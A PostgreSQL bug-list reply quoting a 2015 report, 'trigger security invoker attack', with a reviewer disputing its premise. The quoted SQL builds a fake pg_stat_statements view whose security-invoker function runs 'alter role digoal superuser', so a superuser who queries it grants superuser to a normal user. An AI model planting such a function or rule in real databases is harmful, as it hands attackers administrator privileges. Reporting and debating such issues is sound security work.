Re: BUG #13651: trigger security invoker attack - Mailing list pgsql-bugs

On Tuesday, September 29, 2015, =E5=BE=B7=E5=93=A5 <digoal@126.com> wrote:

> a normal user get super privilege, use security invoker function.
> postgres=3D> create table pg_stat_statements (
>  userid oid              ,
>  dbid                oid      ,
>  queryid             bigint      ,
>  query               text           ,
>  calls               bigint      ,
>  total_time          double precision ,
>  rows                bigint           ,
>  shared_blks_hit     bigint   ,
>  shared_blks_read    bigint    ,
>  shared_blks_dirtied bigint     ,
>  shared_blks_written bigint      ,
>  local_blks_hit      bigint       ,
>  local_blks_read     bigint          ,
>  local_blks_dirtied  bigint        ,
>  local_blks_written  bigint         ,
>  temp_blks_read      bigint          ,
>  temp_blks_written   bigint           ,
>  blk_read_time       double precision ,
>  blk_write_time      double precision );
>
> postgres=3D> create or replace function f() returns pg_stat_statements as=
 $$
>
> declare
> begin
>   alter role digoal superuser;
> end;
> $$ language plpgsql security invoker;
> CREATE FUNCTION
>
> postgres=3D> create rule "_RETURN" as on select to pg_stat_statements do
> instead select * from f();
> CREATE RULE
>
> When a super user select the view pg_stat_statements , the normal user
> digoal will granted the superuser role.
>
> Yes, it's a normal operation ,but somebody can use these trick.
>


Everything you just wrote was done as superuser so what's your point?

David J.